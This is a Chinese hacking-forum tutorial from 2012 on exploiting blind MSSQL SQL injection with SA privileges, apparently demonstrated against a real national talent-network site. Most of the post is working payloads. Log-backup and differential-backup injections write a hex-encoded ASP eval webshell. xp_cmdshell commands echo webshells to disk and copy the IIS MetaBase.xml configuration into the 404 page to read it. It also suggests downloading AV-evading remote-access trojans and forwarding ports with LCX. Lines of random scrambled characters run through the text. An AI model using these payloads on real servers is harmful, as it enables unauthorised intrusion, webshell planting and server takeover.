中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]

作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————) l: g+ S0 q; w; J

6 l$ K3 a" e8 {+ v8 w# o& R4 Q- _' @
1 @2 O5 R" d) O* F4 i- P7 `6 I                                                             欢迎高手访问指导,欢迎新手朋友交流学习。5 h; N  V* M& G' b6 X

- F% b( X! b* M' p1 q  x, r                                                                 
: P# `# M/ C# O  A                                                                 ) h6 G5 F# g/ U- i$ b/ y- P- k
                                                                  论坛: http://www.90team.net/
8 [2 r8 t4 P. L" y+ o7 N( Q5 h- J
% W" b: a) f# N' o/ I: Y, {
9 x# \( H( b5 a$ f4 }# S
友情检测国家人才网# M8 i/ \- S; r+ ^
  c! N, a9 I# ]8 D( v. {( _4 ^
5 G& M% y  h. c5 o
内容:MSSQL注入SA权限不显错模式下的入侵" N& u' e0 O* z" h5 V  K" C6 K
" g: c$ G# g$ d* v
, [( X7 D4 B: H( l" L! T. Q
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
, Z4 `3 ?5 ~8 y- j4 b0 E5 L# c2 s. X& \1 ?0 @
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
, c2 D( r/ K/ ?- n7 }1 e/ L* i5 [! f3 P

3 G. |) Y: H+ D3 o. a这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。: R. `- \5 }) h1 G+ d$ ]

# }! M6 S1 \- T& J1 r思路:7 r" ]9 _5 C2 j* X# [: h7 L

- c# t4 e5 F. T/ A& j首先:6 I# \0 W( h/ J# `* s8 k% e" R

/ d; N4 f# j! b7 W( C# e1 q/ b7 Q通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。3 r$ g  p1 W  ?" y

' O/ N5 x* I2 q, u, K. R" N1.日志备份获得Webshell  O+ |% E0 _) o
# |8 \$ g7 ~* M+ x$ R+ W4 P8 p2 x
2.数据库差异备份获得Webshell3 I  K4 G8 U. y# U* z

: f6 ^! i4 f6 \3 q' i/ ?, x) p4.直接下载免杀远控木马。# f5 b; P5 ]: u8 j8 {

3 j# F2 \, S" o5 P* |8 n" e1 `5.直接下载LCX将服务器端口转发出来/ b+ g6 d1 r1 k) `% |
3 u! s3 r( j( ~" i* |$ I
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
+ y, y6 h7 c! G/ h% K& O. o
5 F$ ~  `/ N: M  {9 z
; C, P, r, k8 Z# M; [6 L6 q" ^6 p
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
3 m+ ]' `' o- u
- O8 i2 }# Z! [, p  K我直接演示后面一个方法  n/ ]/ @9 R" \) a  J) k

3 S( r/ I7 S9 C/ C* g
/ P- X6 k# P& k分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 0 X! F" k7 S; ~# M8 ^1 Q- f

# R2 ^  D0 t$ L) p$ f8 j1 {+ M) G4 L( q' P' c" M" ^
3 m$ q5 ]- S8 d4 Y% t* v

7 F  i, f, ?' G9 a& n. n+ \) Y◆日志备份:3 f* A+ s- B9 M: y& V
2 F5 {) L: [) R
+ _, q+ T' Z2 C7 i& ~! m9 Z
1. 进行初始备份% X4 v% L! X4 }) ?8 q) d7 V  m
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
5 W: S6 B- P6 v' g5 z' q* N( C& B0 R2 k" a5 u" l' O) q8 T' C
2. 插入数据
" {* E9 C4 }3 R7 W3 L. B+ a7 G;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--0 Q$ C9 o! ]; W* e# t/ k- Z

4 r6 m2 g- @* o+ D+ L0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
) u: j7 G$ {9 }+ D  
1 H- b* z. C. H4 u+ n1 M* G8 y4 M* b3. 备份并获得文件,删除临时表
& e1 T2 z! b9 f3 L/ U2 e1 s;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--4 V3 l' W( ]/ Y# {4 H
5 H- S; q' K1 g8 `

' y7 k# i1 A' o1 q6 v3 E: h1 @! E$ O* [! \3 Q3 Q
◆数据库差异备份
2 ^. _3 ?, f& ]# G. f9 R
' E9 C- t) A  V# S(1. 进行差异备份准备工作
$ \& @7 m$ K% o6 j3 f! Z' [
" o; X0 y! }# @# n- p4 g;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--# s4 g( H( v  t& }  d+ Q
( I2 g0 P& c, J
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
5 V1 D# g! _6 }% r9 B & f" F( p, q0 W+ Z" g5 H

* ?8 W  ]. }. a* ^8 N& O+ K(2. 将数据写入到数据库( N% q$ s, H  b: v( `% H3 K: l
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- " \: ?9 A9 L+ s
  c) ^( E0 I' R8 S
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>- j8 O" X+ I9 j1 i7 I) |$ O

7 f: T% b7 w; r6 O& N  @8 g3. 备份数据库并清理临时文件! ~$ V. j+ y  ?

( X+ r" _9 L; C! G' I/ S;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
* l/ P4 y2 P" w' U$ S5 ?0 v0 {% L$ _) r7 U
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
/ d& @9 X  U  P. q7 _" j  n3 T& i! _" j* o$ J( ~1 Y& ^

# e6 i0 f8 Z' y" ]
6 ^3 h% B4 x8 _, {' j7 T; g1 E用^转义字符来写ASP(一句话木马)文件的方法:   
! Q- D& t) F* a+ w) Y6 |1 u
( A8 {7 z" f8 _# U/ U* U1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--5 t! b! _/ V3 S$ s

4 A; `) I% W, S2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
, _0 l& g5 y, ^) ?
5 ]: o, m7 S# o9 k' G% |& z读取IIS配置信息获取web路径
* ~+ C8 o% S3 o
; m' h3 O  a' a4 |  W& Y! ?/ m7 B     
! Y' Z4 U( x9 Y) s     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
' _- l6 ^" q# H2 N9 b  r
+ q+ u; Q" y2 X: d; r  O执行命令# n. Q% \$ a) H  G/ H3 i, c" D% ^
     
) M( Z. c) T" J, B9 Z     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--4 i( ^# G4 {+ s1 d% x1 k  I
3 `% _$ g8 n) n  r
5 U. W  T/ K+ x0 E
! e# _: o0 v+ c4 s

: c- B+ r6 B7 j5 W0 |. o  U7 [
1 m/ ]1 a0 H2 ^0 e
$ G# @! M+ B5 \  |8 f7 ~7 Q5 y( S3 a4 e- m2 G: g2 V( f* Q, P

: t* ?1 n' C3 l3 N5 H2 X2 P# X1 c3 s) H  }, G" z* k: W

8 l2 m' A+ g5 ]4 S: Y- K. j7 K) q/ p7 v# R# ^
) ?# X3 ~" Y; u5 e4 ]2 x9 i) y( k

* M8 K8 Z; @: o: H
5 T/ f3 r5 h. c- k9 q% e' Z3 [8 m' z8 U  c

$ y% S+ _; j, b# e3 w9 f9 R9 ^8 A( X
7 U$ x) {: r3 \, c4 s0 C
. M0 w0 G/ g" |6 i: j

! o( w0 I4 v# \2 Q5 S# K
+ K, A7 }" q8 }. b  ~# |  ^1 g3 S: n+ C/ @

/ `" q$ q; Z4 H' j0 i& P6 p2 q$ }, _9 B9 O7 _$ s

; l- D% q2 x5 W6 Q2 ]1 l7 l* H5 Y" \( ^1 m  ?) l

0 v) U# H5 V) _: F! H" @. A& H, z( L0 g- L5 u
4 n# g6 [5 ]  b

! ~; \& w6 g: o; a- L! P" ~6 w/ J  \2 W, d
2 b. b* h* g( `8 j( `

7 X0 K  @) V7 i; u1 h2 C2 _& Y6 u. b9 j; k

! m$ Q  g7 c8 ?, K( Y; H
  W1 k1 C! ?, c' W/ O1 Y% z+ p# R* M: n! U
, S8 w; d; O! ?- T9 \8 E
- u/ k2 z- D" F
% n( B8 H) h0 R! b6 o  A
7 T& y1 E  F' p$ k% n# `

* D! I6 g5 O( i7 @" M& a/ [+ W7 y# M$ T
% S5 Q7 p& k. e' ^; S
6 H$ m0 C0 |4 D, J- u9 A# R! i" J' [

5 H+ Q* s$ p! N0 G. Q
6 L1 d& b; Z1 {+ W; o4 k8 N  U0 ^' I6 w" a! n; Z





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2